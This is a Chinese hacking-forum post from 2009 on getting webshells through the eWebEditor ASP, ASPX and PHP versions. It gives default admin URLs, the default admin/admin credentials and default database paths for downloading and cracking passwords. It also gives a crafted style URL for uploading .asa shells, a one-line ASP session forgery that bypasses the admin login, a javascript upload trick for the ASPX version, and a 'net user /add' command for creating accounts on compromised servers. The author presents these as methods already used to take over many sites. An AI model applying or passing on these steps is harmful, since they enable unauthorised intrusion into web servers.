渗透前期快速拿shell的捷径/Ewebeditor/ASP/ASPX/PHP各版本漏洞
社区服务
火星文
银行
结婚
道具中心
勋章中心
管理操作原因
基本信息
管理团队
管理操作
在线会员
会员排行
版块排行
帖子排行
手机版
小说论坛
用户中心
搜索
银行
猴岛论坛
帖子
用户
版块
帖子
高级搜索
社区服务
跑跑卡丁车
娱乐时尚星座
纪念馆
动漫剧场
校园青春
签到统计
原神
关闭
选中
1
篇
全选
猴岛论坛
电脑百科
渗透前期快速拿shell的捷径/Ewebeditor/ASP/ASPX/PHP各版本漏洞
发帖
回复
倒序阅读
最近浏览的帖子
最近浏览的版块
« 返回列表
新帖
悬赏
任务
交易贴
自动发卡
拍卖
红包
际遇红包
0
个回复
渗透前期快速拿shell的捷径/Ewebeditor/ASP/ASPX/PHP各版本漏洞
楼层直达
happylove11
ZxID:1328382
关注Ta
注册时间
2007-12-31
最后登录
2012-01-10
发帖
862
在线
162小时
精华
2
DB
24
威望
523
保证金
0
桃子
0
鲜花
0
鸡蛋
0
访问TA的空间
加好友
用道具
发消息
加好友
他的帖子
对该用户使用道具
qq
等级:
上校
态度决定一切
举报
只看楼主
使用道具
楼主
发表于: 2009-01-16
0
— (shimei) 请你把帖子中和到一起好吗?别这样分开发表帖子。这样俺看着很累啊 (2009-01-17 08:46) —
最近又想从新写blog了,以前总是拿别人的东西贴
今天准备在blog上自己写点东西吧,没什么技术含量,就算一个总结吧
希望对菜鸟们有些帮助,牛人们表要笑我,呵呵
ewebeditor,相信玩黑的小牛和大牛们都已经非常熟悉了,而且运用的也相当的熟练了吧?其实这个本来也不想写了,想想用他拿了那么多站了,不留个纪念还是不好的,:)
首先:来段官方的介绍
eWebEditorTM 是什么? 在线HTML编辑器!
eWebEditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!
如果有兴趣的话去官方了解详情:
http://www.ewebeditor.net/
先说重点吧,这个编辑器按脚本分主要有3个版本,ASP/ASPX/PHP/ 每个版本都可以利用的
ASP版:
这个版本其实个人感觉是影响最大,使用最多的一个了吧,早期很多asp站都用这个,当然现在也是大量的存在的。。。
怎么利用呢?一般用这个的默认后台的URL都是默认的:
www.xxx.com/admin/ewebeditor/login_admin.asp
类似
www.xxx.com/ewebeditor/login_admin.asp
www.xxx.com/admin/eweb/login_admin.asp
www.xxx.com/admin/editor/login_admin.asp
而且账户和密码也基本都是默认的:admin admin
对于找这个路径还有个简单的方法,就是在他站上新闻或者其他板块上找图片,看图片的URL也是可以找到的,不明白的自己试下就知道了
还有如果默认的账户和密码修改了,我们可以下载他的数据库,然后本地破解MD5了
默认数据库:
.../db/ewebeditor.mdb 或者 .../db/ewebeditor.asp
一般下载数据库后打开察看就可以了,然后后台登陆,新加样式。。。上传ASA马。。。
有的站数据库设置了只读属性,这样的站你是无法新加样式的,这样的站你可以看他数据库里的样式设置情况,一般很多时候都是让人给拿过的,而且明显的asa在那里。。。呵呵,这样的话就可以直接构造一个调用这个样式的连接来上传shell
比如发现数据库里有样式 123 他设置的是可以上传asa的话
那么就可以这样调用:
http://www.xxx.com/eWeb/eWebEditor.asp?id=contentCN&style=123
这样就可以直接上传了,然后在点“编辑”就会找到shell的路径了
其实这个漏洞主要是upload.asp的过滤不严造成的,新版的应该都修复了,具体受影响的版本我也没统计过
另外在公布另外一个ewebeditor的漏洞
漏洞文件:Admin_Private.asp
漏洞语句:
<%
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个mrchen.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问mrchen.asp,再访问后台任何文件,for example:Admin_Default.asp
这个拿shell的方法就简单了,不详细说了,不懂的可以联系我qq:8175229
ASPX版:
受影响文件:eWebEditorNet/upload.aspx
利用方法:添好本地的cer的Shell文件。在浏揽器输入javascript:lbtnUpload.click();就能得到shell,具体大家自己尝试,不明白的联系我,或者留言
PHP版:
由于PHP脚本特殊性(默认权限高),这个就不公布太多了
当然简单的,默认后台,默认账户密码:admin admin 还是可以用的
单单这一个不算漏洞的漏洞也能直接拿下很多服务器了,呵呵,很多直接系统权限
shell里直接 net user xxx xxx /add 都是可以的。。。。
好了现在凌晨2点半了,也困了,想起这些就写这些吧,以后有想写的在补充,也希望看过的朋友们,牛人们多多指点,多多补充,呵呵,没什么技术含量!
注意:看完此文的朋友千万别找我问我怎么找这些漏洞的Server,这个我不会回答你的,如果是技术上的问题,我会把我知道的告诉你,另外本文没什么技术含量,如果非要转载的话希望留个版权,谢谢
本帖de评分:
共
0
条评分
隐藏
本帖de打赏:
共
条打赏
隐藏
打赏
收藏
新鲜事
相关主题
帮助网站站长解决最近流行的com/css/c.js注入问题!
在PPT中快速批量插入图片的方法
用Word快速制作表格的几个小技巧
想学习抓鸡扫描,免杀,汇编,拿站的朋友来...(免费)
第一课拿论坛的号和密码请求加精+++++
WinXP/2000操作系统自动关机的实现
回复
引用
鲜花[
0
]
鸡蛋[
0
]
« 返回列表
发帖
回复
关闭